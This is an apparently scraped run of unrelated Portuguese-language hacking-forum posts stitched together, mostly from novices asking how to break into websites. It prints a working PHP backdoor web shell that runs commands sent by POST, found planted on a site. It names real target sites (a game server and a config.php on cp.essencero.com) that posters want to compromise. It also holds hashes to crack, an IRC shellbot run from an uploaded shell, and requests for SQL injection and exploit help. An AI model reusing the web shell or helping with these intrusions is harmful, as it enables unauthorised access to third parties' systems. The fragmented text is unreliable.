Vulnerabilidades ssl:
O atacante pode interceptar os dados do site na internet.
Exmplo: quando o user acessa o site, o site envia pacotes de dados para o user, dai o hacker pode fazer o "homem no meio".
Pelo que eu lembro o hacker vai ficar entre o site e os users captando tudo o que passa de um para o outro, por isso o nome homem no meio.
Para se aprofundar melhor você pode fazer uma busca por "homem no meio" aqui no forum ou no google.
Também é conhecido como "man in the midle".

Pessoal alguém pode me ajudar?

tipo eu upei o shell no server direitinho porém quando eu vou alterar algo aparece essa mensagem:

Error: Can't chmod to 0777.

Diz que eu não posso mudar os arquivos para 0777,estão atualmente todos em mode de leitura apenas...Isso não é em apenas um site é em 2 por isso eu acho que quem esta fazendo porcaria sou eu...alguém pode me ajudar ai plz?

Tô com um problema no metasploit...
Quando vou criar o banco de dados acontece isso:

e si eu tentar selecionar um banco de dados ele não funfa...

Oq eu faço? :X

pessoal sou novo aqui parabens pelo forum...

Estou aprendento a invadir um site um servidor de um jogo ryltorment.com instalei belezinha o backtrack e tals... e acompanhei 2 tuto em video de como invadir um server...

Porem tenho algumas duvidas:

1 - Eu scaniei o site via nikto e apresentou os servicos como apache, openssh, php, mysql... dae fui procurar um exploit para o servico openssh, até acho o exploit mas nao sei se ta certo tipo aparece openssh a versao 0.9 que é a do server e aparece o tipo (remote, local, web app..), e tem outros tipos, para a invasao de um site é o exploit remote... ?? naum sei

2 - baixei um exploit e veio em .c pelo shell tentei compila com os comandos
# gcc exploit.c -o exploit (aqui ele aparece erro)
Gostaria de saber se ta certo ou como compila corretamente e transformar em .pl (Perl)

pessoal sou iniciante (lammer) eu reconheco heheh,

Ficaria muito grato pelo reply

Fala pessoal ...

Achei esse script backdoor em um php hospedado em um site num arquivo php

<?php;$c=$HTTP_POST_VARS[address];if ($c <> ""){print "==========::*-_~^~_-*::==========\n";print "Command: ";print $c;print "\n----------------------------------------\n";passthru(stripslashes($c));}else{header("Locat ion: ");};?>


Gostaria de saber se alguem sabe como usa-lo ???

Esse scrypt é algum header shell ?

Obrigado !!!

aew galera to com uma duvida aki
uso o win 7 ultimate x64

tipo antes tava nornal agora ta nao ta mais


eu abria autoruns normal
agora qiando clik no autoplay pra abrir alguma coisa nao abre
mas no agendador de tarefas tem o processo em execuçao do autoplay
resumidno
ele abre mas nao mostra a janela
e nao sao todos só alguns

GALERA ME AJUDA AI COMO EXPLORO ESSAS FALHAS? JA RODEI EXPLOIT NAS DUAS MAIS SEM SUCESSO ALGUEM TEM EXPLOIT OU OUTRA FORMA DE ME AJUDAR? ...

CGI Scripts : Invision Power Board Index.PHP Post Action SQL Injection Vulnerability

CGI Scripts : Invision Power Board QPid Parameter SQL Injection Vulnerability

DNS Services : ISC BIND Remote DNSSEC Validation Denial of Service Vulnerability
DNS Services : ISC BIND Remote DNSSEC Validation Denial of Service Vulnerability


E TAMBÉM ESSAS HASH's NÃO CONSIGO QUEBRÁ-LAS JA TENTEI DE TUDO.

ACREDITO Q ESSA SEJA MD5 MAIS NÃO CONSEGUI NEM NO GOOGS..
fb73ee204c6a0fb81b66a165d4f6835c

E ESSA SEJA SHA-1 EU ACHO.
31f7e5a9ce34ea4bbf04ae7210bc8122:Pu6QYnYbhgPssyYc

BOM É ISSO PESSOAL SE PUDEREM ME AJUDAR FICAREI GRATO.

ae galera eu queria saber qual proxy se usa e como usa um proxy no firefox mosila..agradeço acolaboralçao...

ou alguem poderia me aconselhar algum ou me manda um link de algum proxy..
agradeço...

Como proteger meu forum/site de defacer?

Lendo arquivos sensiveis de php

Olá a todos, este é meu primeiro tópico. Passei as ultimas duas horas lendo e vendo algumas video aulas de Defacer(Principalmente a de como utilizar falhas no fopen do N4ss), testei e consegui fazer o defacer com sucesso em alguns casos.

Mas o por quê do meu interesse para essa área é, tenho um arquivo config.php que está localizado em "http://cp.essencero.com/config.php", e fiz de tudo para tentar baixar este arquivo e conseguir ler sua source, mas todos sem sucesso.

Gostaria de saber se alguem poderia me dizer algum modo de conseguir ler este arquivo, ou invadir o phpmyadmin de outra maneira, mas tendo acesso ao config.php estaria mais que de bom tamanho para mim.

Obrigado a atenção

Consegui fazer um shellbot se conectar ao servidor/canal Irc e depois de 5 minutos ele caiu, tentei colocar o comando perl de novo no site que está minha shell e o bot não se conecta mais,

Alguém sabe o por quê?

Verifique a rede que vc está conectando...
Certas redes bloqueiam ip's de proxy ou muito estranhos.
Outra coisa pode ser que algum ircop tenha desconfiado e baniu a faixa de ip do seu bot.
Qualquer coisa, tente outro bot...
Oque mais tem é pela net.
Abraço

Ai que fica o problema, já tentei em 4 servidores ircs, depois que consegui na 1ª vez não consegui mais =S

Boa noite pessoal, sussegado ?

Preciso de um help no SQL Inject tanto quanto ASP e PHP.
Tenho dificuldades pra achar os nomes das tabelas e colunas, me informem métodos para as duas linguagens que realmente funcione por favor !

Abração ;*